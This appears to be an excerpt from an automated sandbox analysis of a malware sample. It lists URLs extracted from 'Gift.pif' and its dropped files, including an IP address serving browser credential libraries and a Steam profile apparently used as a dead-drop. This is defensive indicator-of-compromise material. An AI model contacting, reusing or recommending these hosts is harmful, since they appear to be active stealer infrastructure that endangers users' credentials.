                        Source: Gift.pif, 0000000B.00000002.3229571283.0000000019329000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3235679571.0000000025208000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3241733034.00000000310E7000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3226753649.00000000133B2000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                        Source: lem.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                        Source: Gift.pif, 0000000B.00000002.3229571283.0000000019329000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3235679571.0000000025208000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3241733034.00000000310E7000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3226753649.00000000133B2000.00000004.00000800.00020000.00000000.sdmp, lem.exe, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: http://ocsp.digicert.com0
                        Source: Gift.pif, 0000000B.00000002.3229571283.0000000019329000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3235679571.0000000025208000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3241733034.00000000310E7000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3226753649.00000000133B2000.00000004.00000800.00020000.00000000.sdmp, lem.exe, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: http://ocsp.digicert.com0A
                        Source: Gift.pif, 0000000B.00000002.3229571283.0000000019329000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3235679571.0000000025208000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3241733034.00000000310E7000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3226753649.00000000133B2000.00000004.00000800.00020000.00000000.sdmp, lem.exe, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: http://ocsp.digicert.com0C
                        Source: Gift.pif, 0000000B.00000002.3229571283.0000000019329000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3235679571.0000000025208000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3241733034.00000000310E7000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3226753649.00000000133B2000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: http://ocsp.digicert.com0N
                        Source: Gift.pif, 0000000B.00000002.3229571283.0000000019329000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3235679571.0000000025208000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3241733034.00000000310E7000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3226753649.00000000133B2000.00000004.00000800.00020000.00000000.sdmp, lem.exe, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: http://ocsp.digicert.com0X
                        Source: lem.exe, 00000000.00000003.2024634817.0000000002936000.00000004.00000020.00020000.00000000.sdmp, Appendix.0.dr, Gift.pif.2.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
                        Source: lem.exe, 00000000.00000003.2024634817.0000000002936000.00000004.00000020.00020000.00000000.sdmp, Appendix.0.dr, Gift.pif.2.drString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
                        Source: lem.exe, 00000000.00000003.2024634817.0000000002936000.00000004.00000020.00020000.00000000.sdmp, Appendix.0.dr, Gift.pif.2.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                        Source: lem.exe, 00000000.00000003.2024634817.0000000002936000.00000004.00000020.00020000.00000000.sdmp, Appendix.0.dr, Gift.pif.2.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
                        Source: lem.exe, 00000000.00000003.2024634817.0000000002936000.00000004.00000020.00020000.00000000.sdmp, Appendix.0.dr, Gift.pif.2.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreemen
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                        Source: lem.exe, 00000000.00000003.2031229309.000000000293B000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000000.2069414252.0000000000399000.00000002.00000001.01000000.00000006.sdmp, Gift.pif.2.dr, Automobile.0.drString found in binary or memory: http://www.autoitscript.com/autoit3/J
                        Source: Gift.pif, 0000000B.00000002.3229571283.0000000019329000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3235679571.0000000025208000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3241733034.00000000310E7000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3226753649.00000000133B2000.00000004.00000800.00020000.00000000.sdmp, lem.exe, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: http://www.digicert.com/CPS0
                        Source: Gift.pif, 0000000B.00000002.3229571283.0000000019329000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3250430219.000000006C38D000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.11.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                        Source: Gift.pif, 0000000B.00000002.3222741041.000000000C23D000.00000002.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3222989934.000000000C64A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: http://www.valvesoftware.com/legal.htm
                        Source: 76561199747278259[1].htm.11.drString found in binary or memory: https://188.245.87.202
                        Source: Gift.pif, 0000000B.00000002.3217461443.00000000016AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.245.87.202/V;
                        Source: Gift.pif, 0000000B.00000002.3217461443.00000000016AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.245.87.202/_;
                        Source: Gift.pif, 0000000B.00000002.3217461443.00000000016AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.245.87.202/freebl3.dll
                        Source: Gift.pif, 0000000B.00000002.3217461443.00000000016AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.245.87.202/mozglue.dll
                        Source: Gift.pif, 0000000B.00000002.3217461443.00000000016AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.245.87.202/msvcp140.dll
                        Source: Gift.pif, 0000000B.00000002.3217806128.00000000046BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://188.245.87.202/nss3.dll
                        Source: Gift.pif, 0000000B.00000002.3217806128.00000000046BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://188.245.87.202/nss3.dllG
                        Source: Gift.pif, 0000000B.00000002.3217461443.00000000016AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.245.87.202/softokn3.dll
                        Source: Gift.pif, 0000000B.00000002.3217806128.00000000046BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://188.245.87.202/sqls.dll
                        Source: Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.245.87.202/vcruntime140.dll
                        Source: Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.245.87.202/vcruntime140.dll1J
                        Source: Gift.pif, 0000000B.00000002.3217998328.000000000484E000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://188.245.87.202KJD
                        Source: DHCBGD.11.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                        Source: 76561199747278259[1].htm.11.drString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                        Source: Gift.pif, 0000000B.00000002.3226364575.000000001295A000.00000004.00000800.00020000.00000000.sdmp, AFHDGD.11.drString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
                        Source: Gift.pif, 0000000B.00000002.3226364575.000000001295A000.00000004.00000800.00020000.00000000.sdmp, AFHDGD.11.drString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
                        Source: DHCBGD.11.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                        Source: DHCBGD.11.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                        Source: DHCBGD.11.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=zGRpBs82SFHJ&a
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=GG0UCGgA
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=Dbzy
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=english
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=english
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=Q4LAS9-JZwft&l=e
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
                        Source: 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=_D2Bg4UEaFxK&l=en
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
                        Source: Gift.pif, 0000000B.00000002.3226364575.000000001295A000.00000004.00000800.00020000.00000000.sdmp, AFHDGD.11.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                        Source: Gift.pif, 0000000B.00000002.3226364575.000000001295A000.00000004.00000800.00020000.00000000.sdmp, AFHDGD.11.drString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
                        Source: DHCBGD.11.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                        Source: DHCBGD.11.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                        Source: DHCBGD.11.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://help.steampowered.com/en/
                        Source: AFHDGD.11.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                        Source: Gift.pif, 0000000B.00000002.3229571283.0000000019329000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3235679571.0000000025208000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3241733034.00000000310E7000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3226753649.00000000133B2000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: https://mozilla.org0/
                        Source: 76561199747278259[1].htm.11.drString found in binary or memory: https://steamcommunity.com/
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://steamcommunity.com/discussions/
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                        Source: 76561199747278259[1].htm.11.drString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199747278259
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://steamcommunity.com/market/
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://steamcommunity.com/my/wishlist/
                        Source: Gift.pif, 0000000B.00000002.3217461443.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544771101.000000000465B000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217998328.00000000046E1000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217806128.00000000045E0000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544847220.0000000001676000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217806128.0000000004688000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2545299732.000000000465B000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544400162.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544656418.00000000016AF000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544847220.00000000016A2000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544427666.000000000465C000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544576964.00000000046E1000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217806128.00000000046BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199747278259
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://steamcommunity.com/profiles/76561199747278259/badges
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://steamcommunity.com/profiles/76561199747278259/inventory/
                        Source: Gift.pif, 0000000B.00000002.3217806128.00000000046BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199747278259E
                        Source: Gift.pif, 0000000B.00000002.3217461443.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544771101.000000000465B000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217998328.00000000046E1000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217806128.00000000045E0000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544847220.0000000001676000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217806128.0000000004688000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2545299732.000000000465B000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544400162.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544656418.00000000016AF000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544847220.00000000016A2000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544427666.000000000465C000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544576964.00000000046E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199747278259gi_z2Mozilla/5.0
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://steamcommunity.com/workshop/
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.c
                        Source: 76561199747278259[1].htm.11.drString found in binary or memory: https://store.steampowered.com/
                        Source: 76561199747278259[1].htm.11.drString found in binary or memory: https://store.steampowered.com/about/
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://store.steampowered.com/explore/
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://store.steampowered.com/legal/
